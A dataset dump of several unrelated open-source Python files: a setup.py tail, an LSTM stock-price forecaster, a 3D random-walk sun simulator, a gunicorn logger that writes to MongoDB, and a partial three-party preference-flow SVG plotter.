'author_email': 'jonas@29a.ch',
'url': 'http://29a.ch/playitslowly/',
'packages': ['playitslowly'],
'scripts': ['bin/playitslowly'],
'options': {'py2exe':{
'packages': 'encodings',
'includes': 'cairo, pango, pangocairo, atk, gobject',
'dist_dir': 'dist/win32',
'optimize': 2,
}},
'data_files': ls_r('share'),
'license': 'GNU GPL v3',
'classifiers': [
'Environment :: X11 Applications :: GTK',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Natural Language :: English',
'Operating System :: POSIX',
'Programming Language :: Python',
]
}
try:
import py2exe
kwargs['windows'] = [{'script': 'bin/playitslowly',
'icon_resources': [(1, 'playitslowly.ico')],
'dest_base': 'playitslowly'}]
except ImportError:
pass
setup(**kwargs)
| jwagner/playitslowly | setup.py | setup.py | py | 2,789 | python | en | code | 96 | github-code | 36 | [
{
"api_name": "distutils.command.install.install",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "distutils.command.install.install.initialize_options",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "distutils.command.install.install",
"line_number": 12,... |
13957012079 | import tensorflow as tf
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from numpy.random import random_integers
import os
import pandas as pd
from math import floor
# Matplotlib fig params
mpl.rcParams['figure.figsize'] = (8, 6)
mpl.rcParams['axes.grid'] = False
# Enable eager for easy to use TF
#tf.enable_eager_execution()
def getData(location):
# Get the data into pandas df
data = pd.read_csv(location)
# Univariate data for close indexed on data -> numpy array
uni_data = data.iloc[:, 5]
uni_data.index = data['Date']
uni_data = uni_data.values
return uni_data
def univariate_data(dataset, start_index, end_index, history_size, target_size):
data = []
labels = []
start_index = start_index + history_size
if end_index is None:
end_index = len(dataset) - target_size
for i in range(start_index, end_index):
# Every group of 20
indices = range(i - history_size, i)
# Reshape data from (history_size,) to (history_size, 1)
# Data is now groups of 20 records - x data
data.append(np.reshape(dataset[indices], (history_size, 1)))
# Labels = the day to predict in question - y data
labels.append(dataset[i + target_size])
return np.array(data), np.array(labels)
def getData(location):
# Get the data into pandas df
data = pd.read_csv(location)
# Univariate data for close indexed on data -> numpy array
uni_data = data.iloc[:, 5]
uni_data.index = data['Date']
uni_data = uni_data.values
return uni_data
def normalizeData(TRAIN, uni_data):
# Getting training data metrics
uni_train_min = np.amin(uni_data[:TRAIN])
uni_train_max = np.amax(uni_data[:TRAIN])
uni_data = (uni_data - uni_train_min) / uni_train_max
return uni_data, uni_train_min, uni_train_max
def trainValSplit(uni_data, TRAIN, HISTORIC_REC, TARGET_REC):
# This will be:
# x = previous records
# y = next record prediction
x_train_uni, y_train_uni = univariate_data(uni_data, 0, TRAIN,
HISTORIC_REC,
TARGET_REC)
x_val_uni, y_val_uni = univariate_data(uni_data, TRAIN, None,
HISTORIC_REC,
TARGET_REC)
return x_train_uni, y_train_uni, x_val_uni, y_val_uni
def create_time_steps(length):
return list(range(-length, 0))
def show_plot(plot_data, delta, title):
labels = ['History', 'True Future', 'Model Prediction']
marker = ['.-', 'rx', 'go']
time_steps = create_time_steps(plot_data[0].shape[0])
if delta:
future = delta
else:
future = 0
plt.title(title)
for i, x in enumerate(plot_data):
if i:
plt.plot(future, plot_data[i], marker[i], markersize=10,
label=labels[i])
else:
plt.plot(time_steps, plot_data[i].flatten(), marker[i], label=labels[i])
plt.legend()
plt.xlim([time_steps[0], (future + 5) * 2])
plt.xlabel('Time-Step')
return plt
def showSampleExample(x_train_uni, y_train_uni, val):
plot = show_plot([x_train_uni[val], y_train_uni[val]], 0, 'Sample Example')
plt.show()
def baseline(history):
return np.mean(history)
def showBaselinePrediction(x_train_uni, y_train_uni, val):
plot = show_plot([x_train_uni[val], y_train_uni[val], baseline(x_train_uni[val])], 0,
'Baseline Prediction Example')
plt.show()
def batchAndShuffleData(BUFFER_SIZE, BATCH_SIZE, x_train_uni, y_train_uni, x_val_uni, y_val_uni):
train_univariate = tf.data.Dataset.from_tensor_slices((x_train_uni, y_train_uni))
train_univariate = train_univariate.cache().shuffle(BUFFER_SIZE).batch(BATCH_SIZE, drop_remainder=True).repeat()
val_univariate = tf.data.Dataset.from_tensor_slices((x_val_uni, y_val_uni))
val_univariate = val_univariate.batch(BATCH_SIZE, drop_remainder=True).repeat()
return train_univariate, val_univariate
def createModel(tensorShape):
simple_lstm_model = tf.keras.models.Sequential([
tf.keras.layers.LSTM(8, input_shape=tensorShape),
tf.keras.layers.Dense(1)
])
simple_lstm_model.compile(optimizer='adam', loss='mae')
return simple_lstm_model
# for x, y in val_univariate.take(1):
# print(simple_lstm_model.predict_on_batch(x).shape)
##### 2
def CreateModel(train_data_shape):
model = createModel(train_data_shape[-2:])
return model
##### 1
def PrepTrainData(location):
HISTORIC_REC = 30
TARGET_REC = 0
BATCH_SIZE = 1
BUFFER_SIZE = 200
data = getData(location)
TRAIN = floor(0.8 * len(data))
ndata, nmin, nmax = normalizeData(TRAIN, data)
x_train_uni, y_train_uni, x_val_uni, y_val_uni = trainValSplit(ndata, TRAIN, HISTORIC_REC, TARGET_REC)
train_univariate, val_univariate = batchAndShuffleData(BUFFER_SIZE, BATCH_SIZE, x_train_uni, y_train_uni, x_val_uni, y_val_uni)
return train_univariate, val_univariate, x_train_uni.shape
#### 3
def TrainModel(model, train_univariate, val_univariate, filename):
    """Fit *model* on the prepared datasets and persist it under trained/."""
    EVALUATION_INTERVAL = 200  # batches per epoch (datasets repeat forever)
    EPOCHS = 50
    model.fit(
        train_univariate,
        epochs=EPOCHS,
        steps_per_epoch=EVALUATION_INTERVAL,
        validation_steps=50,
        validation_data=val_univariate,
    )
    model.save("trained/trained_model" + filename)
    return model
def LoadModel(m_name):
    """Load and return a previously saved Keras model from *m_name*."""
    return tf.keras.models.load_model(m_name)
def GetPrediction(dataset, model, forecast):
    """Autoregressively roll *model* forward *forecast* steps (capped at 30).

    The last 30 normalised points seed the model; each prediction is
    perturbed via Noys(), fed back into the sliding window, and the whole
    forecast is de-normalised then shifted so it starts at the last
    observed value. Returns the forecast as a plain Python list.
    """
    if forecast > 30:
        forecast = 30  # window length is fixed at 30, so cap the horizon
    # plt.plot(data)
    hdata, nmin, nmax = normalizeData(len(dataset), dataset)
    hdata = hdata[-30:]  # seed window: the most recent 30 normalised points
    p_ya = np.array([])
    # x-positions for the forecast; unused here (TestModels builds its own)
    p_x = np.arange(len(dataset), len(dataset) + forecast)
    for x in range(0, forecast):
        # (batch, timesteps, features) as expected by the LSTM input layer
        hdata = hdata.reshape(1, 30, 1)
        y_hat = model.predict(hdata)
        y_hat = Noys(y_hat)  # random perturbation of the point forecast
        # if abs(y_hat - p_ya[-1]) > 0.5*y_hat:
        #     y_hat = y_hat/5
        # slide the window: append the prediction, drop the oldest point
        hdata = np.append(hdata, y_hat)
        hdata = np.delete(hdata, 0)
        p_ya = np.append(p_ya, y_hat)
    # undo normalisation, then anchor the forecast to the last observed value
    p_ya = p_ya * nmax + nmin
    diffy = dataset[-1] - p_ya[0]
    p_ya = p_ya + diffy
    # plt.plot(p_x, p_ya)
    # plt.show()
    return np.ndarray.tolist(p_ya)
def Noys(y_hat):
    """Perturb a prediction with random multiplicative noise.

    Draws an integer in [-2, 2]. Even draws (-2, 0, 2) apply +/-30%;
    odd draws apply -15% for -1 and leave +1 untouched (the `noys > 1`
    branch in the odd arm is unreachable and kept only for symmetry).
    """
    # FIX: `random_integers` was deprecated and then removed from NumPy.
    # np.random.randint has an exclusive upper bound, so (-2, 3)
    # reproduces the old inclusive [-2, 2] range.
    noys = np.random.randint(-2, 3)
    if noys % 2 == 0:
        if noys > 1:
            y_hat = y_hat + y_hat*0.30
        elif noys < 1:
            y_hat = y_hat - y_hat*0.30
    else:
        if noys > 1:
            y_hat = y_hat + y_hat*0.15
        elif noys < 1:
            y_hat = y_hat - y_hat*0.15
    return y_hat
def GetTrainedModel(path: str):
    """Convenience wrapper: load the trained model stored at *path*."""
    return LoadModel(path)
# GetPrediction('../data/AAPL.csv', t_m, 20)
def TrainSet(data_dir="/Users/christopherochs/financial-forecasting-api/models/data"):
    """Train one shared model across every CSV series found in *data_dir*.

    *data_dir* used to be hard-coded to an absolute developer path; it is
    now a parameter with that old value as its default, so existing callers
    are unaffected.
    """
    model = CreateModel((30, 1))
    for filename in os.listdir(data_dir):
        if filename.endswith(".csv"):
            # NOTE(review): files are discovered in data_dir but *read* from
            # '../data/' — these only agree when run from the models/ folder
            # with data_dir pointing at ../data. Confirm before relying on it.
            print('../data/' + filename)
            train, val, t_shape = PrepTrainData('../data/' + filename)
            model = TrainModel(model, train, val, filename)
def TestModels(filename, dataname):
    """Plot a 5-step forecast from trained/<filename> against the data tail."""
    model = LoadModel('trained/' + filename)
    history = getData('../data/' + dataname)
    history = history[-100:]  # only chart the most recent 100 points
    forecast_x = np.arange(len(history), len(history) + 5)
    forecast_y = GetPrediction(history, model, 5)
    plt.title(filename + " on " + dataname)
    plt.plot(history)
    plt.plot(forecast_x, forecast_y)
    plt.show()
| ptallo/financial-forecasting-api | models/univarmodel.py | univarmodel.py | py | 7,529 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.rcParams",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.rcParams",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "pandas.read_csv",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "num... |
9156690869 | import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import random
from matplotlib.animation import FuncAnimation
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
def randomwalk3D(n, angle_degrees, escape_radius=100):
    """Simulate an n-step 3D random walk scattering inside a sphere.

    While within *escape_radius* of the origin, the travel direction is
    rotated each step by a random angle in [-angle_degrees, +angle_degrees]
    about a randomly chosen coordinate axis, with a position-dependent
    chance of being reflected straight back. Outside the radius the walker
    travels in a straight line. Returns (x, y, z) position arrays of
    length n.
    """
    x, y, z = np.zeros(n), np.zeros(n), np.zeros(n)
    angle_rad = np.radians(angle_degrees)
    current_direction = np.array([1, 0, 0])  # Initial direction (e.g., to the right)

    def density(x, y, z):
        # Density function that varies with position: falls off with
        # distance from the origin. Modify to create a different gradient.
        return 1.0 / (1.0 + np.sqrt(x**2 + y**2 + z**2))

    for i in range(1, n):
        # Calculate the distance from the origin (sun)
        distance = np.sqrt(x[i - 1]**2 + y[i - 1]**2 + z[i - 1]**2)
        if distance > escape_radius:
            # If outside the escape radius, move straight in the current direction
            x[i] = x[i - 1] + current_direction[0]
            y[i] = y[i - 1] + current_direction[1]
            z[i] = z[i - 1] + current_direction[2]
        else:
            # Generate a random reflection angle within the specified range
            reflection_angle = np.random.uniform(-angle_rad, angle_rad)
            # Generate a random axis of rotation (x, y, or z)
            axis = random.choice([0, 1, 2])
            # Create a 3D rotation matrix based on the chosen axis and angle
            rotation_matrix = np.identity(3)
            if axis == 0:
                rotation_matrix = np.dot(np.array([[1, 0, 0],
                                                   [0, np.cos(reflection_angle), -np.sin(reflection_angle)],
                                                   [0, np.sin(reflection_angle), np.cos(reflection_angle)]]), rotation_matrix)
            elif axis == 1:
                rotation_matrix = np.dot(np.array([[np.cos(reflection_angle), 0, np.sin(reflection_angle)],
                                                   [0, 1, 0],
                                                   [-np.sin(reflection_angle), 0, np.cos(reflection_angle)]]), rotation_matrix)
            else:
                rotation_matrix = np.dot(np.array([[np.cos(reflection_angle), -np.sin(reflection_angle), 0],
                                                   [np.sin(reflection_angle), np.cos(reflection_angle), 0],
                                                   [0, 0, 1]]), rotation_matrix)
            # Apply the rotation to the current direction
            current_direction = np.dot(rotation_matrix, current_direction)
            # Adjust the probability of reflection based on density:
            # deeper (denser) positions are more likely to keep direction.
            reflection_prob = density(x[i - 1], y[i - 1], z[i - 1])
            if np.random.rand() > reflection_prob:
                current_direction = -current_direction  # Reflect back
            # Update the position
            x[i] = x[i - 1] + current_direction[0]
            y[i] = y[i - 1] + current_direction[1]
            z[i] = z[i - 1] + current_direction[2]
    return x, y, z
# Number of iterations (animation frames; one independent walk each)
num_iterations = int(1e3)
# Lists to store escape times for each iteration
escape_times = []
iteration_numbers = []
num_escapes = 0  # running count of walks judged to have escaped
# Radius of the sphere drawn for the sun (same value as animate()'s escape radius)
sun_radius = int(1e2)
# 3D figure and axis for the entire plot
fig = plt.figure(figsize=(6, 6))
ax = fig.add_subplot(111, projection='3d')
# List to store the line objects for each frame
all_lines = []
# Function to initialize the animation
def init():
    """FuncAnimation init hook: blank every trail line and both text labels."""
    for trail in all_lines:
        trail.set_data([], [])
        trail.set_3d_properties([])
    average_escape_text.set_text('')
    escape_count_text.set_text('')
    return all_lines + [average_escape_text, escape_count_text]
# Function to calculate and update the average escape time
def update_average_escape(iteration):
    """Refresh the on-plot average escape-time label (cleared when no data)."""
    if escape_times:
        average_escape = sum(escape_times) / len(escape_times)
        average_escape_text.set_text(f'Average Counts to Escape: {average_escape:.2f}')
    else:
        average_escape_text.set_text('')
    return average_escape_text,
# Function to animate frames and define escape parameters
def animate(iteration):
    """Per-frame callback: run one fresh 3D walk, plot its trail, update stats."""
    global num_escapes  # num_escapes is mutated below, hence the global
    n_steps = int(5e4)
    reflection_angle_degrees = random.uniform(0, 180)
    x_data, y_data, z_data = randomwalk3D(n_steps, reflection_angle_degrees)
    distances = np.sqrt(x_data**2 + y_data**2 + z_data**2)
    escape_radius = int(1e2)
    # Index of the first step beyond the escape radius (0 if never escaped).
    escape_time = np.argmax(distances > escape_radius)
    # NOTE(review): this compares the radius (100) against a step *index*;
    # it looks like it was meant to test whether the walk escaped at all
    # (e.g. `escape_time > 0`) — confirm before trusting the escape count.
    if escape_radius < escape_time:
        num_escapes += 1
    escape_times.append(escape_time)
    iteration_numbers.append(iteration + 2)
    # Draw this walk's trail in a random colour and keep it for blitting.
    line, = ax.plot(x_data, y_data, z_data, '-', linewidth=0.5, alpha=0.5, color=np.random.rand(3,))
    all_lines.append(line)
    # Update the average escape text
    average_escape_text.set_text(f'Mean escape counts: {np.mean(escape_times):.2f}')
    # Update the escape count text
    escape_count_text.set_text(f'Escapes: {num_escapes} / {n_steps}')
    iteration_count_text.set_text(f'Iteration: {iteration}')
    return all_lines + [average_escape_text, escape_count_text, iteration_count_text]
# Text annotations for the average escape time, escape count and iteration
average_escape_text = ax.text2D(0.005, 0.005, '', transform=ax.transAxes, fontsize=10, color='black')
escape_count_text = ax.text2D(0.005, 0.035, '', transform=ax.transAxes, fontsize=10, color='black')
iteration_count_text = ax.text2D(0.005, 0.07, '', transform=ax.transAxes, fontsize=10, color='black')
# Create the animation (one frame per independent walk)
ani = FuncAnimation(fig, animate, frames=num_iterations, init_func=init, interval = 0.1, blit=True, repeat=False)
# Create a sphere to represent the Sun (parametric surface over u, v)
u = np.linspace(0, 2 * np.pi, 100)
v = np.linspace(0, np.pi, 100)
x_sun = sun_radius * np.outer(np.cos(u), np.sin(v))
y_sun = sun_radius * np.outer(np.sin(u), np.sin(v))
z_sun = sun_radius * np.outer(np.ones(np.size(u)), np.cos(v))
ax.plot_surface(x_sun, y_sun, z_sun, color='yellow', alpha=0.3)
# Define Plot  (title string kept as-is, "Psudo" sic)
ax.set_title('Psudo Sun Simulator')
ax.set_xlim(-150, 150)
ax.set_ylim(-150, 150)
ax.set_zlim(-150, 150)
plt.show()
# Optionally show a histogram of escape times once the animation window closes
histogram = input("Histogram plot? (y or any other key for no): ")
if histogram == 'y':
    plt.figure()
    plt.hist(escape_times, bins=1000, color='blue', alpha=0.7)
    plt.xlabel('Escape Time')
    plt.ylabel('Frequency')
    plt.title('Escape Time Histogram')
    plt.show()
| shafransky93/PsudoSunSimulator | randwalk.py | randwalk.py | py | 6,660 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "numpy.radians",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": ... |
11545489040 | from logging import INFO, getLogger, StreamHandler, Formatter, DEBUG, INFO
from os import environ
from urlparse import urlparse
from gunicorn.glogging import Logger
from log4mongo.handlers import MongoHandler, MongoFormatter
# parse the MONGOLAB_URI environment variable to get the auth/db info
MONGOLAB_URI_PARSED = urlparse( environ[ 'MONGOLAB_URI' ] )
MONGOLAB_CONF_DICT = dict(
host = MONGOLAB_URI_PARSED.hostname,
port = MONGOLAB_URI_PARSED.port,
database_name = MONGOLAB_URI_PARSED.path[ 1: ],
username = MONGOLAB_URI_PARSED.username,
password = MONGOLAB_URI_PARSED.password
)
# determine if we are running in production (e.g., on Heroku), or locally
PRODUCTION = environ[ 'VERSION' ] == 'production'
# setup the root logger so that application logs go to mongolab
def setup_logging( name ):
    """Attach a MongoDB (production) or stderr (local) handler to *name*'s logger."""
    root_logger = getLogger( name )
    if PRODUCTION:
        chosen = MongoHandler( level = DEBUG, collection = 'application-log', **MONGOLAB_CONF_DICT )
        chosen.setFormatter( MongoFormatter() )
    else:
        chosen = StreamHandler()
        chosen.setLevel( DEBUG )
        chosen.setFormatter( Formatter( '%(asctime)s [%(process)d] [%(levelname)s/APPLICATION] %(message)s', '%Y.%m:%d %H:%M:%S' ) )
    root_logger.setLevel( DEBUG )
    root_logger.addHandler( chosen )
# define a logger so that gunicorn sends access and error logs to mongolab
# gunicorn logger subclass: ships access and error logs to MongoDB in
# production, and access logs to stderr locally.
class GunicornLogger( Logger ):
    def __init__( self, cfg ):
        super( GunicornLogger, self ).__init__( cfg )
        if PRODUCTION:
            access_handler = MongoHandler( level = INFO, collection = 'access-log', **MONGOLAB_CONF_DICT )
            error_handler = MongoHandler( level = INFO, collection = 'error-log', **MONGOLAB_CONF_DICT )
            access_handler.setFormatter( MongoFormatter() )
            error_handler.setFormatter( MongoFormatter() )
            # FIX: access_handler was created and formatted but never
            # attached, so production access logs were silently dropped.
            self.access_log.addHandler( access_handler )
            self.access_log.setLevel( INFO )
            self.error_log.addHandler( error_handler )
            self.error_log.setLevel( INFO )
        else:
            access_handler = StreamHandler()
            access_handler.setFormatter( Formatter( '%(asctime)s [%(process)d] [%(levelname)s/ACCESS] %(message)s', '%Y.%m:%d %H:%M:%S' ) )
            self.access_log.addHandler( access_handler )
            self.access_log.setLevel( INFO )
| mapio/heroku-log4mongo | heroku-log4mongo/logger.py | logger.py | py | 2,096 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "urlparse.urlparse",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "os.environ",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "logging.getLogger",
"line... |
11168036307 | #!python3
"""
Construct a mouseoverable SVG of three-party-preferred outcomes.
We'll call the three parties "blue" (x-axis), "green" (y-axis) and "red" (with R + G + B == 1).
The primary methods that you'll want to call are `get_args` and `construct_svg`.
"""
from typing import Tuple
import sys
import math
from enum import Enum
import argparse
# Stylesheet baked into the SVG <defs> when --css is not supplied (see
# construct_svg); the class names match those emitted by construct_dot et al.
DEFAULT_CSS = """
text {font-family: sans-serif; font-size: 10px; fill: #222;}
text.label {filter: url(#keylineEffect); font-weight: bold}
/* dot, red, green, blue, tie*/
.d {opacity:0.6;}
.d:hover {opacity:1;}
.r {fill: #d04}
.g {fill: #0a2}
.b {fill: #08e}
.t {fill: #888}
/* point of interest */
.poi {stroke:#000; fill-opacity:0.4; stroke-width: 0.3%}
.line {stroke: #222; stroke-width: 0.5%; fill:none; stroke-linecap:round;}
#triangle {fill: #222}
.arrow {fill:none; stroke:#111; stroke-width:0.5%; stroke-dasharray:4 2; stroke-dashoffset:0;}
.bg {fill: #fff}
"""
class Party(Enum):
    """The three contenders; each value is (display name, one-letter CSS class)."""
    RED = ("Labor", "r")
    GREEN = ("Greens", "g")
    BLUE = ("Coalition", "b")
# NOTE: throughout this file we'll use a variable called `A` to store our general state
# This replaces the original and pervasive use of globals.
# Default values are set in `get_args`
def p2c(blue_pct: float, green_pct: float, A: argparse.Namespace) -> Tuple[float, float]:
    """Map (blue, green) vote shares onto SVG pixel coordinates.

    Out-of-frame inputs are mapped as-is rather than clipped here; line()
    owns clipping, since it has the context this function lacks.
    """
    span = A.stop - A.start
    x_frac = (blue_pct - A.start) / span
    y_frac = (green_pct - A.start) / span
    x = x_frac * A.inner_width + A.offset * A.scale
    y = (1 - y_frac) * A.inner_width + A.scale  # SVG y grows downward
    return (x, y)
def calculate_winner(red_pct: float, green_pct: float, blue_pct: float, A: argparse.Namespace) -> Tuple[Party, float]:
    '''Given 3PP percentages, calculate the winner and their 2CP result.
    Ties for third are resolved where the winner is the same either way,
    with the tighter 2CP result reported.

    Falls through (implicitly returning None) when the tie cannot be
    resolved; callers rely on the TypeError raised when unpacking that
    None to detect a tie.
    '''
    def eq(x, y):
        """Equal, to a certain tolerance"""
        # sufficiently close for our purposes: a tenth of a dot-step
        return math.isclose(x, y, abs_tol=A.step/10)
    def lt(x, y):
        """Strictly less than, beyond a certain tolerance"""
        return (x < y) and not eq(x, y)
    def gt(x, y):
        """Strictly greater than, beyond a certain tolerance"""
        return lt(y, x)
    # need to figure out who came third, then who won:
    # eliminate the third party, distribute its preferences per A's flows.
    if lt(red_pct, green_pct) and lt(red_pct, blue_pct):
        # Red came third
        tcp = green_pct + (A.red_to_green * red_pct)
        if gt(tcp, 0.5):
            return (Party.GREEN, tcp)
        elif gt(1.0 - tcp, 0.5):
            return (Party.BLUE, 1.0 - tcp)
    if lt(green_pct, red_pct) and lt(green_pct, blue_pct):
        # Green came third
        tcp = red_pct + (A.green_to_red * green_pct)
        if gt(tcp, 0.5):
            return (Party.RED, tcp)
        elif gt(1.0 - tcp, 0.5):
            return (Party.BLUE, 1.0 - tcp)
    if lt(blue_pct, green_pct) and lt(blue_pct, red_pct):
        # Blue came third
        tcp = red_pct + (A.blue_to_red * blue_pct)
        if gt(tcp, 0.5):
            return (Party.RED, tcp)
        elif gt(1.0 - tcp, 0.5):
            return (Party.GREEN, 1.0 - tcp)
    # print("likely tie:", green_pct, red_pct, blue_pct, file=sys.stderr)
    # resolve some ties for third
    # if the leading party would win EITHER way, report their win and tightest margin
    # else, return nothing (interpreted as a tie)
    if eq(green_pct, blue_pct) and lt(green_pct, red_pct):
        # Red leading; gex/bex are the flows Red gains from each rival's exclusion
        gex = green_pct * A.green_to_red
        bex = blue_pct * A.blue_to_red
        if red_pct + gex > 0.5 and red_pct + bex > 0.5:
            return (Party.RED, red_pct + min(gex, bex))
    if eq(red_pct, blue_pct) and lt(red_pct, green_pct):
        # Green leading
        rex = red_pct * A.red_to_green
        bex = blue_pct * A.blue_to_green
        if green_pct + rex > 0.5 and green_pct + bex > 0.5:
            return (Party.GREEN, green_pct + min(rex, bex))
    if eq(green_pct, red_pct) and lt(green_pct, blue_pct):
        # Blue leading
        gex = green_pct * A.green_to_blue
        rex = red_pct * A.red_to_blue
        if blue_pct + gex > 0.5 and blue_pct + rex > 0.5:
            return (Party.BLUE, blue_pct + min(gex, rex))
    # print("actual tie:", green_pct, red_pct, blue_pct, file=sys.stderr)
    # unresolved tie: fall through and return None
def construct_dot(blue_pct: float, green_pct: float, A: argparse.Namespace) -> str:
    """Return an SVG <circle> fragment for one 3CP combination, classed by winner.

    calculate_winner() returns None on an unresolved tie, making the tuple
    unpack raise TypeError; that case renders as a grey tie dot.
    """
    red_pct = 1.0 - (green_pct + blue_pct)
    (x, y) = p2c(blue_pct, green_pct, A)
    tooltip_3cp = f"{Party.GREEN.value[0]}: {green_pct:.1%}, {Party.RED.value[0]}: {red_pct:.1%}, {Party.BLUE.value[0]}: {blue_pct:.1%}."
    try:
        (winner, margin) = calculate_winner(red_pct, green_pct, blue_pct, A)
        css_class = (winner.value)[1]
        tooltip = f"{tooltip_3cp} Winner: {(winner.value)[0]} {margin:.1%}"
    except TypeError:  # raised on a tie
        css_class = "t"
        tooltip = f"{tooltip_3cp} Winner: TIE"
    dot = f'<circle cx="{x:g}" cy="{y:g}" r="{A.radius:g}" class="{css_class} d"><title>{tooltip}</title></circle>'
    # ".0%" -> "%" tidies tooltips like "40.0%" into "40%"
    return dot.replace(".0%", "%")
def frange(start, stop=None, step=None):
    '''Floating-point range. [start = 0.0], stop, [step = 1.0]

    Mirrors range(): frange(stop) or frange(start, stop[, step]).
    Yields floats; an explicit stop of 0.0 yields nothing, like range(0).
    '''
    start = float(start)
    if stop is None:  # single-argument form: frange(stop)
        stop = start
        start = 0.0
    if step is None:
        step = 1.0
    # FIX: the old truthiness tests (`if not stop` / `if not step`) treated
    # an explicit 0.0 as "missing", so frange(0) looped forever yielding
    # 0.0; terminate immediately instead, matching range(0).
    if stop == 0.0:
        return
    count = 0.0
    while True:
        t = start + count * step
        if stop > 0.0 and t >= stop:
            break
        elif stop < 0.0 and t <= stop:
            break
        yield t
        count += 1.0
def clamp_val(val: float, lo: float, hi: float) -> float:
    """Constrain *val* to the interval [lo, hi]."""
    capped = min(val, hi)
    return max(capped, lo)
def clamp(val: float, A: argparse.Namespace) -> float:
    """Constrain val to be within A.start and A.stop (the plotted axis range)."""
    return clamp_val(val, A.start, A.stop)
def line(x0: float, y0: float, x1: float, y1: float, A: argparse.Namespace) -> str:
    """Takes two points (percentage-space) and returns the appropriate SVG
    path fragment ("M x0 y0 x1 y1"), clipping both endpoints to the
    viewport; returns "" when the whole segment is off-viewport."""
    # we COULD have just used <clipPath> but this is even cleaner in the SVG
    # general principle: there'll be a gradient.
    # if anything is off the edge, we can replace with appropriate point on the edge
    xa = clamp(x0, A)
    ya = clamp(y0, A)
    xb = clamp(x1, A)
    yb = clamp(y1, A)
    if math.isclose(x0, x1):
        # special case: vertical line
        # we can clamp without fear
        pass
    elif math.isclose(y0, y1):
        # horizontal line
        pass
    elif (x0 <= A.start and x1 <= A.start) or (y0 <= A.start and y1 <= A.start) or \
            (x0 >= A.stop and x1 >= A.stop) or (y0 >= A.stop and y1 >= A.stop):
        # whole of line would be off-viewport
        return ""
    else:
        # get the line equation...
        m = (y1 - y0)/(x1 - x0)  # gradient
        c = y0 - m * x0  # y-offset
        # project each out-of-range coordinate back onto the viewport edge
        if x0 < A.start:
            ya = m * A.start + c
        elif x0 > A.stop:
            ya = m * A.stop + c
        if x1 < A.start:
            yb = m * A.start + c
        elif x1 > A.stop:  # FIX: was `x0 > A.stop`, clipping yb from the wrong endpoint
            yb = m * A.stop + c
        if y0 < A.start:
            xa = (A.start - c) / m
        elif y0 > A.stop:
            xa = (A.stop - c) / m
        if y1 < A.start:
            xb = (A.start - c) / m
        elif y1 > A.stop:
            xb = (A.stop - c) / m
    # Finally, convert to coordinates and return
    (xp, yp) = p2c(xa, ya, A)
    (xq, yq) = p2c(xb, yb, A)
    return f"M {xp:g} {yp:g} {xq:g} {yq:g}"
def draw_lines(A: argparse.Namespace) -> str:
    """Draw change-of-winner lines.

    Computes the boundary polylines between the three winners' regions
    (Red/Green, Red/Blue and Blue/Green), plus the diagonal where the sum
    of shares hits 100%, and returns them as one SVG <path>.
    """
    # There are at least 8 points to draw lines between.
    # Firstly, a line #1-#2-#3
    # 1. Green vs Red on Y axis
    (x1, y1) = (A.start, (0.5 - (A.start * A.blue_to_green)))
    # 2. Green vs Red midpoint. Controlled by ex-Blue split
    # At max Greens-Red preferencing, it varies from
    # (0.25, 0.5) at full Blue-to-Red
    # degenerates at equal split (to terpoint)
    # (0.25, 0.25) at full Blue-to-Green
    # there's a line coming out of the terpoint that (at least for normal values)
    # marks out the "Greens 3CP >= Labor 3CP == Liberal 3CP"
    # 1 - (g+b) = b
    # and another coming in from #1 that marks the Labor-Greens 2CP boundary
    # g + (b * A.blue_to_green) = 0.5
    # This point is where those lines cross: we have Greens 3CP >= Labor 3CP == Liberal 3CP
    # g = 0.5 - (b * A.blue_to_green)
    # b = 1 - ((0.5 - (b * A.blue_to_green)) + b)
    # b = 0.5 + (b * A.blue_to_green) - b
    # 2b = 0.5 + (b * A.blue_to_green)
    # b (2 - A.blue_to_green) = 0.5
    # b = 0.5 / (2 - A.blue_to_green)
    b = 0.5 / (2 - A.blue_to_green)
    g = 0.5 - (b * A.blue_to_green)
    # if A.blue_to_red is less than half, then #2 sits on the b = g line instead
    # (the gradient of the #1-#2 line is still correct)
    if A.blue_to_red <= 0.5:
        # g = 0.5 - (b * A.blue_to_green)
        # g = 0.5 - (g * A.blue_to_green)
        # g (1 + A.blue_to_green) = 0.5
        g = 0.5 / (1 + A.blue_to_green)
        b = g
    (x2, y2) = (b, g)
    # 3. the (1/3, 1/3) point ("terpoint")
    # Always some sort of boundary
    (x3, y3) = (1.0/3.0, 1.0/3.0)
    # Line #1-#2-#3 represents the Red/Green boundary
    red_green = f'{line(x1, y1, x2, y2, A)} {line(x2, y2, x3, y3, A)}'
    # 4. Red vs Blue midpoint. Basically the inverse of #2, parameterised by ex-Green split
    # same as above except swap b and g and use the green_to_* flows
    g = 0.5 / (2 - A.green_to_blue)
    b = 0.5 - (g * A.green_to_blue)
    if A.green_to_red <= 0.5:
        b = 0.5 / (1 + A.green_to_blue)
        g = b
    (x4, y4) = (b, g)
    # 5. Red vs Blue on X axis
    (x5, y5) = (0.5 - A.start * A.green_to_blue, A.start)
    # Lines #3 - #4 - #5 represents the Red/Blue boundary
    red_blue = f'{line(x3, y3, x4, y4, A)} {line(x4, y4, x5, y5, A)}'
    # 6. Blue vs Green point. This is controlled by Red's Blue/Green split
    # there's one line coming "out" of the terpoint #3
    # (it's NW if red favours blue, SE if red favours green)
    # and one out of the hapoint #7 (the Red-comes-third line)
    # (mostly W if red favours blue, mostly S if red favours green)
    # This point occurs where these two lines cross
    # (if red favours blue, then red and blue will be equal here)
